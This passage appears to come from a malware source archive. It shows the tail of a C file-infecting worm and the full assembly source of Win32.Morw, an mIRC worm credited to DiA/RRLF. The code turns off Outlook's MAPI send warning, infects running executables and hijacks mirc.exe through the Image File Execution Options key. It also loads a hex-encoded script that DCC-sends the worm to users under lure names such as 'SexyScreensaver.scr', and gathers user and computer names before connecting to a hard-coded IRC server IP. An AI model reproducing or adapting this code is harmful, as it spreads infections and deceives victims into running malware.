for(i=strlen(fullpath);i&lt;MAX_PATH;i++,p++)
fullpath[i]=GetValue[p];
strcat(fullpath,"\\Software\\Microsoft\\Outlook Express\\5.0\\Mail");
x=RegOpenKeyEx(HKEY_CURRENT_USER,fullpath,NULL,KEY_WRITE,&hkey);
if (x==0)
RegSetValueEx(hkey,"Warn on Mapi Send",0,REG_DWORD,(LPBYTE)&x,sizeof(x));
} // ^-&gt; Micro$oft Security ;)
RegCloseKey(hkey);
SleepEx(1000,false);
worming();
}
/*-------------------[Memory Resident Functions]--------------*/
BOOL IsProcessExist(char ProcName[])
{
int i;
for(i=0;i&lt;=Position;i++)
{
if(strcmp(lst[i],ProcName)==0)
return (TRUE);
}
return(FALSE);
}
void add_proc(char procname[])
{
if(IsProcessExist(procname)!=TRUE)
{
Position++;
strcpy(lst[Position],procname);
}
}
void ProcFindAll()
{
HANDLE hsnp;
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
stproc.dwSize=sizeof(stproc);
Process32First(hsnp,&stproc);
do
{
add_proc(stproc.szExeFile);
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
}
void FindNextFileToInfect()
{
HANDLE hsnp;
BOOL found_it=TRUE;
char my_Target[MAX_PATH];
strcpy(my_Target,"");
Start:
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
stproc.dwSize=sizeof(stproc);
Process32First(hsnp,&stproc);
do
{
SleepEx(10,0);
if(IsProcessExist(stproc.szExeFile)==FALSE)
{
add_proc(stproc.szExeFile);
strcpy(my_Target,stproc.szExeFile);
break;
}
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
if (strlen(my_Target)==0 && IsProcessExist(my_Target)==TRUE)
{
goto Start;
}
Start2:
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
Process32First(hsnp,&stproc);
do
{
SleepEx(10,0);
if (strcmp(stproc.szExeFile,my_Target) != 0)
{
found_it=FALSE;
}
else if (strcmp(stproc.szExeFile,my_Target) == 0)
{
found_it=TRUE;
}
}
while(Process32Next(hsnp,&stproc));
CloseHandle(hsnp);
if (found_it==TRUE || strlen(my_Target)==0)
{
goto Start2;
}
if (IsInfectable(my_Target)==TRUE)
{
// MessageBox(NULL,my_Target,"Debug:Virus Catch File",MB_OK);
Infect_file(VirusPath,my_Target,"Ml");
}
}
void TSR_Mode()
{
if(strcmp(VirusTempFile,VirusPath)==0)
{
ProcFindAll();
for(int i=1;i&lt;=2;i++)
{
AntiAV();
FindNextFileToInfect();
}
if(Position==149)
ExitProcess(1);
else if(Position!=149)
{
Active_Worm();
SleepEx(10000,0);
TSR_Mode();
}
}
}
void GoTSR()
{
DeleteFile(VirusTempFile);
if (GetFileAttributes(VirusTempFile)==-1)
{
write_virus(VirusPath,VirusTempFile,virus_size);
SleepEx(500,0);
ShellExecute(NULL,"open",VirusTempFile,"","",1);
}
}
/*----------------------[Main Function]--------------------*/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitVirus();
PayLoad();
GoTSR();
Run_Infected_File(VirusPath,VirusParameters,virus_size);
IRC();
Sucker2Sucker();
if (hPrevInstance)
ExitProcess(1);
TSR_Mode();
return 0;
}
Win32/Infector/Win32.Metaphor.asm
+13914
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Morw.asm
+994
View File
@@ -0,0 +1,994 @@
;=================================================================================\
; Win32.Morw |
; (c) by DiA/RRLF |
; www.vx-dia.de.vu - www.rrlf.de.vu |
; |
; Heya, long time ago since i brought you something in asm, but here we go again. |
; This is a worm for the mIRC IRC client. It traps mIRC, means when mIRC gets |
; executed the worm gets executed too. It copys then all necessary files to the |
; system directory, generates and load the mIRC script for spreading. Just |
; look at the script to see how it spreads on the "on JOIN" event. If you ask |
; yourself how to make the script readable, go away kiddie. When the user |
; terminate mIRC, the worm unload the script and delete all temporary files. |
; On every 27th of every month the worm notify the infection to a channel at |
; undernet. Just to be proud of my lil creation. At last i must say sorry, no |
; comments in the source, no extended description here... sucks. But this was |
; a fast one, and the code is also very readable. Have fun with it, and don't |
; forget: DO ANYTHING WITH THIS, BUT AT YOUR OWN RISK. I AM NOT RESPONSIBLE! |
; |
; DiA/RRLF - 06.04.2006 |
;=================================================================================/
include "%fasminc%\win32ax.inc"
section "c" code readable writeable executable
;==================================================
MorwData:
jmp MorwCode
CurrentFile rb 256d
WormFile rb 256d
WormName db "morw.exe", 0
SystemDir rb 256d
MircHandle dd ?
MircWindowName db "mIRC", 0
FileMap dd ?
MircData dd ?
MircPath rb 256d
MircPathSize db 255d
MircRegKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC"
MircPathHandle dd ?
UninstallString db "UninstallString", 0
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION
ScriptFile db "morw.mrc", 0
ScriptHandle dd ?
BytesWritten dd ?
ScriptFoot db 13, 10, "}", 13, 10, "}", 13, 10, 0
SystemTime SYSTEMTIME
FilesTable db "IrcTool.exe", 10d
db "Secure_mIRC.exe", 10d
db "SpeedItUp.exe", 10d
db "InsultQuotes.pif", 10d
db "Instruction.pif", 10d
db "Abuse.pif", 10d
db "YourFile.exe", 10d
db "File.exe", 10d
db "Install.exe", 10d
db "Funny.scr", 10d
db "SexyScreensaver.scr", 10d
db "Screensaver.scr", 10d
db 0
FileBuffer rb 256d
MircScript db 0x76, 0x61, 0x72, 0x20, 0x25, 0x6E, 0x0D, 0x0A, 0x6F, 0x6E, 0x20, 0x31, 0x3A, 0x4A, 0x4F, 0x49
db 0x4E, 0x3A, 0x23, 0x3A, 0x7B, 0x0D, 0x0A, 0x25, 0x6E, 0x20, 0x3D, 0x20, 0x24, 0x6E, 0x69, 0x63
db 0x6B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21, 0x3D, 0x20, 0x24, 0x6D, 0x65
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x2F, 0x74, 0x69, 0x6D, 0x65, 0x72, 0x31, 0x20, 0x31, 0x20, 0x36
db 0x30, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70, 0x72, 0x65, 0x61, 0x64, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x7D, 0x0D, 0x0A, 0x41, 0x6C, 0x69, 0x61, 0x73, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70
db 0x72, 0x65, 0x61, 0x64, 0x20, 0x7B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21
db 0x3D, 0x20, 0x24, 0x6D, 0x65, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x6D
db 0x20, 0x3D, 0x20, 0x24, 0x72, 0x61, 0x6E, 0x64, 0x28, 0x31, 0x2C, 0x20, 0x31, 0x32, 0x29, 0x0D
db 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x29, 0x20, 0x7B, 0x0D, 0x0A
db 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x65, 0x79, 0x2C, 0x20, 0x69, 0x20
db 0x66, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D
db 0x65, 0x20, 0x69, 0x72, 0x63, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x2C, 0x20, 0x68, 0x6F, 0x6C, 0x64
db 0x20, 0x6F, 0x6E, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D
db 0x20, 0x49, 0x72, 0x63, 0x54, 0x6F, 0x6F, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x32, 0x29
db 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x69, 0x2C
db 0x20, 0x69, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x6F, 0x6F
db 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x72
db 0x20, 0x6D, 0x49, 0x52, 0x43, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73
db 0x65, 0x6E, 0x64, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65
db 0x63, 0x75, 0x72, 0x65, 0x5F, 0x6D, 0x49, 0x52, 0x43, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D
db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x33
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x63, 0x68
db 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6C, 0x69, 0x74
db 0x74, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x70, 0x65, 0x65
db 0x64, 0x20, 0x75, 0x70, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x74, 0x72, 0x61, 0x6E, 0x73, 0x66
db 0x65, 0x72, 0x73, 0x2C, 0x20, 0x69, 0x74, 0x27, 0x73, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D, 0x65
db 0x2C, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66
db 0x20, 0x3D, 0x20, 0x53, 0x70, 0x65, 0x65, 0x64, 0x49, 0x74, 0x55, 0x70, 0x2E, 0x65, 0x78, 0x65
db 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20
db 0x3D, 0x20, 0x34, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D
db 0x20, 0x45, 0x79, 0x21, 0x20, 0x53, 0x6F, 0x6D, 0x65, 0x20, 0x70, 0x65, 0x6F, 0x70, 0x6C, 0x65
db 0x20, 0x6F, 0x6E, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C
db 0x20, 0x74, 0x6F, 0x6C, 0x64, 0x20, 0x6D, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x69, 0x6E, 0x73
db 0x75, 0x6C, 0x74, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B, 0x20
db 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x71, 0x75
db 0x6F, 0x74, 0x65, 0x73, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x75, 0x6C, 0x74, 0x51, 0x75, 0x6F, 0x74, 0x65, 0x73, 0x2E, 0x70
db 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25
db 0x6D, 0x20, 0x3D, 0x20, 0x35, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73
db 0x20, 0x3D, 0x20, 0x50, 0x6C, 0x65, 0x61, 0x73, 0x65, 0x20, 0x64, 0x6F, 0x6E, 0x27, 0x74, 0x20
db 0x6D, 0x61, 0x6B, 0x65, 0x20, 0x74, 0x72, 0x6F, 0x75, 0x62, 0x6C, 0x65, 0x20, 0x6F, 0x6E, 0x20
db 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C, 0x21, 0x20, 0x53, 0x65
db 0x65, 0x20, 0x74, 0x68, 0x65, 0x73, 0x65, 0x20, 0x69, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74
db 0x69, 0x6F, 0x6E, 0x20, 0x68, 0x6F, 0x77, 0x20, 0x74, 0x6F, 0x20, 0x66, 0x6F, 0x6C, 0x6C, 0x6F
db 0x77, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x75, 0x6C, 0x65, 0x73, 0x20, 0x69, 0x6E, 0x20, 0x74
db 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25
db 0x66, 0x20, 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x2E
db 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28
db 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x36, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25
db 0x73, 0x20, 0x3D, 0x20, 0x41, 0x62, 0x75, 0x73, 0x65, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B
db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6F, 0x72, 0x20, 0x79
db 0x6F, 0x75, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x67, 0x65, 0x74, 0x20, 0x62, 0x61, 0x6E, 0x6E
db 0x65, 0x64, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20
db 0x41, 0x62, 0x75, 0x73, 0x65, 0x2E, 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C
db 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x37, 0x29, 0x20, 0x7B, 0x0D
db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x61, 0x68, 0x68, 0x2C, 0x20, 0x68
db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20
db 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x2E, 0x2E, 0x0D
db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x59, 0x6F, 0x75, 0x72, 0x46, 0x69
db 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69
db 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x38, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61
db 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x79, 0x6F, 0x75, 0x72, 0x20, 0x66, 0x69, 0x6C, 0x65
db 0x2C, 0x20, 0x69, 0x20, 0x6A, 0x75, 0x73, 0x74, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x20, 0x69, 0x74
db 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x6E, 0x6F, 0x77, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72
db 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A
db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20
db 0x39, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68
db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x65, 0x74, 0x75, 0x70
db 0x20, 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x21, 0x20
db 0x77, 0x61, 0x69, 0x74, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D
db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31
db 0x30, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68
db 0x65, 0x68, 0x65, 0x68, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74
db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6E, 0x6E, 0x79, 0x20, 0x73, 0x63, 0x72, 0x65
db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66
db 0x20, 0x3D, 0x20, 0x46, 0x75, 0x6E, 0x6E, 0x79, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x31
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x77, 0x6F
db 0x77, 0x2C, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20, 0x70, 0x72, 0x65
db 0x74, 0x74, 0x79, 0x20, 0x64, 0x61, 0x6D, 0x6E, 0x20, 0x73, 0x65, 0x78, 0x79, 0x20, 0x73, 0x63
db 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x2E, 0x2E, 0x20, 0x63, 0x68, 0x65
db 0x63, 0x6B, 0x20, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x2E
db 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65, 0x78, 0x79, 0x53
db 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A
db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20
db 0x31, 0x32, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20
db 0x68, 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x63, 0x72, 0x65
db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69
db 0x20, 0x64, 0x63, 0x63, 0x20, 0x69, 0x74, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
db 0x3D, 0x20, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63
db 0x72, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x2F, 0x6D, 0x73, 0x67, 0x20, 0x25, 0x6E, 0x20, 0x25, 0x73
db 0x0D, 0x0A, 0
MorwCode:
invoke GetModuleFileName,\
0,\
CurrentFile,\
256d
invoke GetSystemDirectory,\
SystemDir,\
256d
invoke lstrlen,\
CurrentFile
mov ebx, CurrentFile
add ebx, eax
sub ebx, 8d
mov ecx, dword [WormName]
cmp dword [ebx], ecx
je StartMirc
invoke lstrcpy,\
WormFile,\
SystemDir
invoke lstrcat,\
WormFile,\
"\"
invoke lstrcat,\
WormFile,\
WormName
invoke SetFileAttributes,\
WormFile,\
FILE_ATTRIBUTE_NORMAL
invoke CopyFile,\
CurrentFile,\
WormFile,\
0
cmp eax, 0
je NeedRoot
invoke SetFileAttributes,\
WormFile,\
FILE_ATTRIBUTE_HIDDEN
mov ebx, 1d
call UnTrapMirc
jmp Exit
StartMirc:
invoke lstrcpy,\
WormFile,\
CurrentFile
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\MorwBy.DiA"
invoke CopyFile,\
WormFile,\
CurrentFile,\
0
cmp eax, 0
je NeedRoot
invoke DeleteFile,\
CurrentFile
invoke RegOpenKeyEx,\
HKEY_LOCAL_MACHINE,\
MircRegKey,\
0,\
KEY_QUERY_VALUE,\
MircPathHandle
cmp eax, 0
jne Exit
invoke RegQueryValueEx,\
dword [MircPathHandle],\
UninstallString,\
0,\
0,\
CurrentFile,\
MircPathSize
cmp eax, 0
jne Exit
invoke RegCloseKey,\
dword [MircRegKey]
invoke lstrlen,\
CurrentFile
mov ebx, CurrentFile
inc ebx
mov ecx, eax
sub ecx, 12d
invoke lstrcpyn,\
MircPath,\
ebx,\
ecx
mov ebx, 0d
call UnTrapMirc
invoke CreateProcess,\
MircPath,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo
cmp eax, 0
je Exit
mov ebx, 1d
call UnTrapMirc
Check:
invoke GetSystemTime,\
SystemTime
cmp word [SystemTime.wDay], 27d
jne BeginToCopy
call Payload
BeginToCopy:
mov ebx, 1d
call CopyDeleteFiles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke CreateFile,\
CurrentFile,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_ALWAYS,\
FILE_ATTRIBUTE_HIDDEN,\
0
mov dword [ScriptHandle], eax
cmp eax, INVALID_HANDLE_VALUE
je Exit
invoke lstrlen,\
MircScript
invoke WriteFile,\
dword [ScriptHandle],\
MircScript,\
eax,\
BytesWritten,\
0
invoke lstrcpy,\
CurrentFile,\
"/dcc send -cl %n "
invoke lstrcat,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\ $+ %f"
invoke lstrcat,\
CurrentFile,\
ScriptFoot
invoke lstrlen,\
CurrentFile
invoke WriteFile,\
dword [ScriptHandle],\
CurrentFile,\
eax,\
BytesWritten,\
0
invoke lstrcpy,\
CurrentFile,\
"on 1:EXIT:/unload -rs "
invoke lstrcat,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke lstrlen,\
CurrentFile
invoke WriteFile,\
dword [ScriptHandle],\
CurrentFile,\
eax,\
BytesWritten,\
0
invoke CloseHandle,\
dword [ScriptHandle]
invoke Sleep,\
120000d
invoke FindWindow,\
MircWindowName,\
0
mov dword [MircHandle], eax
cmp eax, 0
je Exit
invoke CreateFileMapping,\
INVALID_HANDLE_VALUE,\
0,\
PAGE_READWRITE,\
0,\
4096d,\
MircWindowName
mov dword [FileMap], eax
cmp eax, 0
je Exit
invoke MapViewOfFile,\
dword [FileMap],\
FILE_MAP_ALL_ACCESS,\
0,\
0,\
0
mov dword [MircData], eax
cmp eax, 0
je CloseHandles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke lstrcpy,\
dword [MircData],\
"//load -rs "
invoke lstrcat,\
dword [MircData],\
CurrentFile
invoke SendMessage,\
dword [MircHandle],\
WM_USER + 200d,\
1d,\
0
WaitForExit:
invoke FindWindow,\
MircWindowName,\
0
cmp eax, 0
je MircTerminated
invoke Sleep,\
1000d
jmp WaitForExit
MircTerminated:
mov ebx, 0d
call CopyDeleteFiles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke DeleteFile,\
CurrentFile
CloseHandles:
invoke UnmapViewOfFile,\
dword [MircData]
invoke CloseHandle,\
dword [FileMap]
invoke CloseHandle,\
dword [MircHandle]
jmp Exit
NeedRoot:
invoke MessageBox,\
0,\
"Please execute this application as Administrator.",\
0,\
MB_ICONERROR
Exit:
invoke ExitProcess, 0
UnTrapMirc:
jmp UnTrapMircStart
RegFileExec db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options", 0
RegHandle dd ?
MircName db "mirc.exe", 0
RegMircHandle dd ?
UntrapValue db "", 0
Debugger db "Debugger", 0
UnTrapMircStart:
;in: ebx = trap (1) or untrap (0)
; WormFile = must be path to the installed worm path
;out: eax = error (131313h) or ok (1)
invoke RegOpenKeyEx,\
HKEY_LOCAL_MACHINE,\
RegFileExec,\
0,\
KEY_ALL_ACCESS,\
RegHandle
cmp eax, 0
jne UnTrapMircError
invoke RegCreateKey,\
dword [RegHandle],\
MircName,\
RegMircHandle
cmp eax, 0
jne UnTrapMircError
cmp ebx, 1d
je TrapMirc
mov edx, UntrapValue
jmp SetValue
TrapMirc:
mov edx, WormFile
SetValue:
invoke lstrlen,\
edx
inc eax
dec edx
invoke RegSetValueEx,\
dword [RegMircHandle],\
Debugger,\
0,\
REG_SZ,\
edx,\
eax
mov ecx, eax
UnTrapMircError:
invoke RegCloseKey,\
dword [RegMircHandle]
invoke RegCloseKey,\
dword [RegHandle]
cmp ecx, 0h
je UnTrapMircOk
mov eax, 131313h
jmp UnTrapMircReturn
UnTrapMircOk:
mov eax, 1d
UnTrapMircReturn:
ret
CopyDeleteFiles:
;in: ebx = Copy (1) or Delete (0)
;out: nothing
mov edx, FilesTable
mov ecx, 0
GetFileName:
cmp byte [edx + ecx], 10d
je HaveFileName
cmp byte [edx + ecx], 0
je CopyDeleteReturn
inc ecx
jmp GetFileName
HaveFileName:
inc ecx
push edx
push ecx
invoke lstrcpyn,\
FileBuffer,\
edx,\
ecx
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
FileBuffer
cmp ebx, 0d
je DeleteFileX
invoke CopyFile,\
WormFile,\
CurrentFile,\
0
pop ecx
pop edx
add edx, ecx
mov ecx, 0
jmp GetFileName
DeleteFileX:
invoke SetFileAttributes,\
CurrentFile,\
FILE_ATTRIBUTE_HIDDEN
invoke DeleteFile,\
CurrentFile
pop ecx
pop edx
add edx, ecx
mov ecx, 0
jmp GetFileName
CopyDeleteReturn:
ret
Payload:
jmp PayloadStart
WSAData WSADATA
SockAddr dw AF_INET
SockAddr_Port dw ?
SockAddr_IP dd ?
SockAddr_Zero rb 8d
SocketDesc dd ?
CharBuff rb 2d
LineBuff rb 256d
Pong db "PONG "
PongBuff rb 16d
UserName rb 26d
UserNameSize dd 26d
CompName rb 26d
CompNameSize dd 26d
Nick rb 26d
CRLF db 10d, 13d, 0
PayloadStart:
invoke GetUserName,\
UserName,\
UserNameSize
invoke GetComputerName,\
CompName,\
CompNameSize
mov ecx, 0
GenerateNick:
cmp ecx, 8d
je HaveNick
mov al, byte [UserName + ecx]
mov byte [Nick + ecx], al
inc ecx
mov al, byte [CompName + ecx - 1]
mov byte [Nick + ecx], al
inc ecx
jmp GenerateNick
HaveNick:
invoke lstrcat,\
Nick,\
"morw"
invoke lstrlen,\
Nick
invoke CharLowerBuff,\
Nick,\
eax
invoke WSAStartup,\
0101h,\
WSAData
cmp eax, 0
jne PayloadReturn
invoke socket,\
AF_INET,\
SOCK_STREAM,\
0
mov dword [SocketDesc], eax
cmp eax, -1
je PayloadReturn
invoke inet_addr,\
"69.16.172.34"
mov dword [SockAddr_IP], eax
invoke htons,\
6667d
